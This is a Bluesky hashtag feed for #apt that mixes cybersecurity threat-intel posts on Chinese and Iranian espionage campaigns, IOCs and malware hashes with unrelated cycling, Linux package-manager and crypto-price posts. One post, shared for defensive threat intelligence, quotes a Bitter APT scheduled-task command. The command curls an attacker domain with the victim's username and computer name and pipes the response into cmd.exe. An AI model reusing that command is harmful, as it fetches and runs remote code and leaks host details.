Trending

#apt

Latest posts tagged with #apt on Bluesky

Latest Top
Trending

Posts tagged #apt

Preview
[March-14-2026] Daily Cybersecurity Threat Report [March-14-2026] Daily Cybersecurity Threat Report The Daily Tech Feed - Cybersecurity Daily Report

[March-14-2026] Daily Cybersecurity Threat Report
thedailytechfeed.com/march-14-202...
#Ransomware #DataBreach #InfoSec #DarkWeb #IncidentResponse #CyberReport #APT #Malware #Phishing #CyberDefense #Hacktivist #Cybercriminal #Vulnerabilities #Darkweb #AI #Fraud #Privacy #Exploits #Digital #Theft

1 1 0 0
Post image

Chinese state-sponsored hackers target Southeast Asian militaries with advanced malware like AppleChris and MemFun. #CyberEspionage #MilitarySecurity #APT #CyberThreats Link: thedailytechfeed.com/chinese-cybe...

0 0 0 0
Preview
Chinese Threat Actors Attack Southeast Asian Military Targets via Malware A China-based cyber espionage campaign is targeting Southeast Asian military targets. The state-sponsored campaign started in 2020.  Palo Alto Networks Unit 42 has been tracking the campaign under the name CL-STA-1087. Here, CL means cluster, and STA means state-backed motivation.  According to security experts Yoav Zemah and Lior Rochberger, “The activity demonstrated strategic operational patience and a focus on highly targeted intelligence collection, rather than bulk data theft. The attackers behind this cluster actively searched for and collected highly specific files concerning military capabilities, organizational structures, and collaborative efforts with Western armed forces.” About the campaign The campaign shows traces commonly linked with APT campaigns, such as defense escape tactics, tailored delivery methods, custom payload deployment, and stable operational infrastructure to aid sustained access to hacked systems. MemFun and AppleChris Threat actors used tools such as backdoors called MemFun and AppleChris, and a credential harvester called Getpass. Experts found the hacking tools after finding malicious PowerShell execution that allowed the script to go into a sleep state and then make reverse shells to a hacker-controlled C2 server. Experts don't know about the exact initial access vector.  About the attack sequence The compromise sequence deploys AppleChris’ different versions across victim endpoints and moves laterally to avoid detection. Hackers were also found doing searches for joint military activities, detailed assessments of operational capabilities, and official meeting records. The experts said that the “attackers showed particular interest in files related to military organizational structures and strategy, including command, control, communications, computers, and intelligence (C4I) systems.” MemFun and AppleChris are designed to access a shared Pastebin account that serves as a dead-drop resolver to retrieve the real C2 address in Base64-encoded format. An AppleChris version also depends on Dropbox to fetch the C2 details via the Pastebin approach, kept as a backup option. Installed via DLL hijacking, AppleChris contacts the C2 server to receive commands to perform drive enumeration and related tasks.  According to Unit 42, “To bypass automated security systems, some of the malware variants employ sandbox evasion tactics at runtime. These variants trigger delayed execution through sleep timers of 30 seconds (EXE) and 120 seconds (DLL), effectively outlasting the typical monitoring windows of automated sandboxes.”

Chinese Threat Actors Attack Southeast Asian Military Targets via Malware #AppleChris #APT #Data

0 0 0 0
Preview
[March-13-2026] Daily Cybersecurity Threat Report [March-13-2026] Daily Cybersecurity Threat Report The Daily Tech Feed - Cybersecurity Daily Report

[March-13-2026] Daily Cybersecurity Threat Report
thedailytechfeed.com/march-13-202...
#Ransomware #DataBreach #InfoSec #DarkWeb #IncidentResponse #CyberReport #APT #Malware #Phishing #CyberDefense #Hacktivist #Cybercriminal #Vulnerabilities #Darkweb #AI #Fraud #Privacy #Exploits #Digital #Theft

0 0 0 0
Post image Post image

Aankomst in Apt

Er is veel wielrennen op TV deze week en omdat ik ontdekt heb dat Eurosport de samenvattingen op Youtube zet, kan ik de wedstrijden ook nog volgen. Meer concreet: Tirreno-Adriatico en Parijs-Nice. Er is maanden geen koers op TV geweest, dus […]

[Original post on filmvanalledag.nl]

0 1 0 0
Post image Post image

PARÍS - NIZA 🇨🇵
♂️ #WORLDTOUR
🏁 #ETAPA 6️⃣

Primera victoria World Tour para el colombiano de @XDSAstanaTeam Harold TEJADA 🇨🇴 que cruza en solitario la meta de #Apt en la #ParisNice
VINGEGAARD 🇩🇰 del @vismaleaseabike sigue líder.

@haroldtejada1 @VingegaardJonas
#Paris #Niza

1 1 0 0
Preview
Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor Iran-linked MuddyWater hackers breached U.S. networks with new Dindoor malware as regional cyber attacks escalate amid Middle East conflict.

Iran-linked MuddyWater hackers are deploying a new Dindoor backdoor targeting sectors like banking, aviation, and software.

Nation-state cyber campaigns increasingly touch private companies too.

thehackernews.com/2026/03/iran...

#CyberSecurity #ThreatIntel #APT

0 0 0 0
Preview
APTUI l’interfaccia testuale per gestire i pacchetti APT APTUI rinnova la gestione dei pacchetti su Debian, Ubuntu e Linux Mint con una TUI moderna, veloce e intuitiva. ì

APTUI porta una moderna interfaccia testuale per gestire pacchetti APT su Debian, Ubuntu e Mint, rendendo installazioni e aggiornamenti più intuitivi. #linux #apt #tui #Software #Ubuntu #Debian #LinuxMint

0 0 0 0

Comprehensive collection of simulated APT campaigns modeling real-world TTPs from Russia, China, Iran and North Korea. Contains custom C2, backdoors, stagers and bootloaders for research and defensive testing. #APT #C2 #adversary_simulation https://bit.ly/3P58KqU

0 0 0 0

🔴 $APT 96% sellers

$APT SELL PRESSURE: 96% sells, volume 3.0x.
Unbalanced flow suggests downside pressure; watch for follow-through or a bounce.
Don’t fight the tape.
Kee...
#APT #bitcoin #ethereum #cryptobsky #orderflow #dump
🔗 voiceofchain.com/event/imb_sell_APT_20260...

0 0 0 0
Preview
[March-12-2026] Daily Cybersecurity Threat Report [March-12-2026] Daily Cybersecurity Threat Report The Daily Tech Feed - Cybersecurity Daily Report

[March-12-2026] Daily Cybersecurity Threat Report
thedailytechfeed.com/march-12-202...
#Ransomware #DataBreach #InfoSec #DarkWeb #IncidentResponse #CyberReport #APT #Malware #Phishing #CyberDefense #Hacktivist #Cybercriminal #Vulnerabilities #Darkweb #AI #Fraud #Privacy #Exploits #Digital #Theft

2 2 0 0
China-Linked Espionage Targets SE Asia Military

~Paloalto~
Suspected Chinese state actors (CL-STA-1087) are targeting SE Asian military entities using custom AppleChris and MemFun backdoors.
-
IOCs: 154. 39. 142. 177, 154. 39. 137. 203, 8. 212. 169. 27
-
#APT #Malware #ThreatIntel

0 1 0 0
Post image

APTUI Introduces a Modern TUI for Debian, Ubuntu, and Mint Packages APTUI is a new open-source terminal UI that simplifies APT package management for Debian, Ubuntu, and Linux Mint users.

#Software #Linux #& #Open #Source #News #apt #package #manager

Origin | Interest | Match

0 0 0 0
Post image

APTUI Introduces a Modern TUI for Debian, Ubuntu, and Mint Packages APTUI is a new open-source terminal UI that simplifies APT package management for Debian, Ubuntu, and Linux Mint users.

#Software #Linux #& #Open #Source #News #apt #package #manager

Origin | Interest | Match

0 0 0 0

#apt #bitter
Database server.rar 8cb6dee642f510d20825e49435e4f814
rar -> vhdx -> jse
->
"Maintenance\Windows10\Drivers\Graphics\VerifiedUpdaterTaskMachineGPU-X-5-93-12798962" /tr "conhost --headless cmd /c curl www.haburyohoteam[.]com/jvdmhawme.okjhvthfv?d=%username%_%computername% | cmd.exe"

0 0 0 0
Preview
[March-11-2026] Daily Cybersecurity Threat Report [March-11-2026] Daily Cybersecurity Threat Report The Daily Tech Feed - Cybersecurity Daily Report

[March-11-2026] Daily Cybersecurity Threat Report
thedailytechfeed.com/march-11-202...
#Ransomware #DataBreach #InfoSec #DarkWeb #IncidentResponse #CyberReport #APT #Malware #Phishing #CyberDefense #Hacktivist #Cybercriminal #Vulnerabilities #Darkweb #AI #Fraud #Privacy #Exploits #Digital #Theft

2 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

#BTC ETF Girişlerinde Artış, #ETH Benimsenme Oranlarında Yükseliş

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, tokenizasyon, düzenleme, ...

Daha fazla oku: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

Aumento degli afflussi di ETF #BTC, adozione di #ETH

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, tokenizzazione, regolamentazione, ...

Leggi di più: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

#BTC ETF-Zuflüsse steigen sprunghaft an, #ETH -Akzeptanz

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, Tokenisierung, Regulierung, ...

Weiterlesen: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

Приток средств в ETF на биткоины резко возрос, ETH получил широкое распространение.

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, токенизация, регулирование, ...

Читать далее: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

Les flux entrants dans les ETF #BTC explosent, l'adoption de l' #ETH s'intensifie

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, tokenisation, réglementation, ...

Lire la suite: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

Aumentan las entradas de ETF de #BTC y la adopción de #ETH

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, tokenización, regulación, ...

Leer más: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

#BTC ETF 유입 급증, #ETH 채택 증가

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, 토큰화, 규제, ...

더 읽기: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

#BTC ETF资金流入激增, #ETH 采用率上升

#XRP#SOL#DOGE#TRX#SUI#APT#WLD 、代币化、监管……

阅读更多: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
BTC ETF Inflows Surge, ETH Adoption

BTC ETF Inflows Surge, ETH Adoption

#BTC ETF Inflows Surge, #ETH Adoption

#XRP, #SOL, #DOGE, #TRX, #SUI, #APT, #WLD, tokenization, regulation, ...

Read more: blockzhub.io/news/69b18df9c05ca97f239...

1 0 0 0
Preview
Alpha Pro Tech, Ltd. Announces Fourth Quarter and Full Year 2025 Financial Results Full Year 2025 Sales Increased to $59.1 Million, Up 2.3%, Compared to $57.8 Million for the Full Year of 2024 Net sales for the year ended December 31, 2025, were $59.1 million, up 2.3% compared to $57.8 million for the year ended December 31, 2024 Net income for the year ended December 31, 2025,

#APT Alpha Pro Tech, Ltd. Announces Fourth Quarter and Full Year 2025 Financial Results

www.stocktitan.net/news/APT/alpha-pro-tech-...

0 0 0 0
APT price chart

APT price chart

🔴 $APT 88% sellers

$APT SELL PRESSURE: 88% sells, volume 2.6x. Opportunity for a potential downside follow-through if price breaks support. Risk: sudden reversal or short-squeeze ca...
#APT #btc #ethereum #bsky #orderflow #crash
🔗 voiceofchain.com/event/imb_sell_APT_20260...

0 0 0 0
Preview
[March-10-2026] Daily Cybersecurity Threat Report [March-10-2026] Daily Cybersecurity Threat Report The Daily Tech Feed - Cybersecurity Daily Report

[March-10-2026] Daily Cybersecurity Threat Report
thedailytechfeed.com/march-10-202...
#Ransomware #DataBreach #InfoSec #DarkWeb #IncidentResponse #CyberReport #APT #Malware #Phishing #CyberDefense #Hacktivist #Cybercriminal #Vulnerabilities #Darkweb #AI #Fraud #Privacy #Exploits #Digital #Theft

0 0 0 0
Iran MOIS Cybercrime Shift

~Checkpoint~
Iranian state actors increasingly use cybercrime tools and RaaS to boost attacks and hide attribution.
-
IOCs: 18. 223. 24. 218
-
#APT #MuddyWater #ThreatIntel

0 0 0 0

#susp #apt
Contact_Letter_To_Ms_Pech_ICB_Cambodia_On_Collaboration.pdf.exe
CN_Contact_Work_Cambodia's_Ministry_of_Public_Works_and_Transport.pdf
e3b51bdcb1b55cf7cb11ef4b3872776b
03e7a4065df354a99add76e8ba7dd37b

0 0 1 0